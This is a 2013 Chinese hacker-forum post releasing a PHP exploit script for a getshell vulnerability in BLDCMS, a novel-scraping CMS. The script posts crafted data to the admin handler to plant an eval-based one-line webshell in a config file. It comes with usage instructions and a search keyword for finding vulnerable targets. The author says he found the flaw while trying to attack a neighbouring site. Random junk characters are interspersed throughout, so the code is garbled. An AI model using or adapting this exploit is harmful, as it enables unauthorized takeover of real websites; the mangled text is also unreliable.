之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞% M6 K' I9 X: Y W3 L: ~- o
3 n1 i1 Z" y8 N
) I7 H5 R8 X; N- }, U+ o话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 # Y" d) N d) n* u( r3 V2 ?
; w6 k' n S4 X8 A. g# ]1 p既然都有人发了 我就把我之前写好的EXP放出来吧
2 D( F# a$ j0 O' j
7 p8 r! E3 u. mview source print?01.php;">+ A4 p/ X' `: X7 _
02.<!--?php7 U! M5 L9 q% Y
03.echo "-------------------------------------------------------------------2 \2 v+ X9 `9 R0 P' q3 ? e
04. l W2 U8 K6 d. U& n# t7 Y( u
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP0 \' u* @2 n& Y% w3 i' B- q
06. ' E: {' c* q. A1 X
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun, v J+ o+ G7 x( w, I: y
08.
6 m$ f, S( m4 Z* W- F8 a- x* s( ]09.QQ:981009941\r\n 2013.3.21\r\n
4 B+ g6 f* _: ]" G- |$ S10.
# i# w$ S- u" h+ {11. 6 j/ h& j% l, G
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
9 o( \/ \" y' m5 r13. & `, c" z! I$ a$ z6 P$ ?
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n----------- l7 h$ t( {& T- A* F0 e
15.
8 `- d. u, H7 f# P8 U8 V( b( U16.--------------------------------------------------------------------\r\n";
. a( G7 H1 m! W. b- e: R z3 I17.$url=$argv[1];
/ `3 w+ I' K! a$ s$ t$ ~) l( P% e18.$dir=$argv[2];
7 ? J& n( _; D: ?7 E+ V19.$pass=$argv[3];
3 c5 r1 A5 O. }: ^- `3 o20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';. U! p) @; s$ e
21.if (emptyempty($pass)||emptyempty($url)); f. Y3 N* F4 j: `9 p# U. H) @5 i
22.{exit("请输入参数");}: d! x( g3 b L2 b; ]2 x/ f
23.else
7 o; h. O: l! M" U24.{6 |/ x/ \) f' J% B
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
5 r) l8 |; m4 r' { o, M" g6 q; H26. i- F, C& \5 n$ ?6 N9 |- s
27.al;
, z2 Y+ J" z. ^) z28.$length = strlen($fuckdata);2 n1 B1 o0 j1 Z& {3 U! ]
29.function getshell($url,$pass)
! I# {3 D r8 M3 h$ T! I# P; J30.{0 w, L7 t0 o4 U9 r
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
6 x2 a+ m: j, z& d4 n* I32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
+ O% a7 |6 k* w: r7 j ~33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
1 Y* n$ Z6 G6 l7 _34.$header .= "User-Agent: MSIE\r\n";! O' G4 n4 H+ o" o* g
35.$header .= "Host:".$url."\r\n";
& g$ Q6 ~8 _5 X. X2 B, J8 _$ Y. |36.$header .= "Content-Length: ".$length."\r\n";; {% A: e' y5 J% S( ]
37.$header .= "Connection: Close\r\n";
7 K1 Y$ I& Q0 {38.$header .="\r\n";
! k" P0 x; P: J1 t' r' r39.$header .= $fuckdata."\r\n\r\n";
1 O3 ?# o3 x, ^% a2 C: L/ m40.$fp = fsockopen($url, 80,$errno,$errstr,15);: V- E+ p* h% [% y3 {5 a
41.if (!$fp)
! \8 e' P1 m ]" w42.{
% L0 w# N( K* Y7 _% T/ [43.exit ("利用失败:请检查指定目标是否能正常打开");7 s) @/ I' J5 {( {* f
44.}! _3 c6 ~9 p: `) @0 Q( l& t
45.else{ if (!fputs($fp,$header))0 m! J7 Z+ A& u8 u% _9 W9 _
46.{exit ("利用失败");}, B4 g+ E: ]+ D# s; r' A0 A
47.else3 f' I. W- y0 U2 U6 X7 p
48.{/ Z3 g' W- c2 b8 M P8 ]. b% O& |
49.$receive = '';
; T6 M( S$ g( ^+ V, _9 ~50.while (!feof($fp)) {
0 P% x+ ^5 d" k- k5 y E2 O* q51.$receive .= @fgets($fp, 1000);) C: o( f9 q1 `' X; r
52.}! O7 G+ N0 C3 w/ C" i
53.@fclose($fp);
% S, U+ e) V, x54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标
! ~2 U! I, Y6 ?. I# O: j* `+ J0 [55.
u ]) W- A4 H2 Z% ^56.GPC是否=off)";. Y& K: M4 u# l" i* s7 s2 @
57.}}+ s: d* M* U% s! f4 f4 m0 V4 u
58.}3 u# d* R: p p# o! S
59.}
\" l8 }: e7 T3 c60.getshell($url,$pass);
1 l( N4 S' k; ~; H" E' L0 R. W61.?-->
# f! S1 ]5 k+ t$ `: o+ H
$ ^( }8 J) u) K6 k' N5 L4 G
* s2 O" q3 z9 t) M# T0 C5 X/ p * n9 g5 n: w. q! _, ~
by 数据流7 |3 r4 C6 J+ Q# X G6 Z2 z
|
发表于 2013-3-26 20:49:10
收藏
支持
反对